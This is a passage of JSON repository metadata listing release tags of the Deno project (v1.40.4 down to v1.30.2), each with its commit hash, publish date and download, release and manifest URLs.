l,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland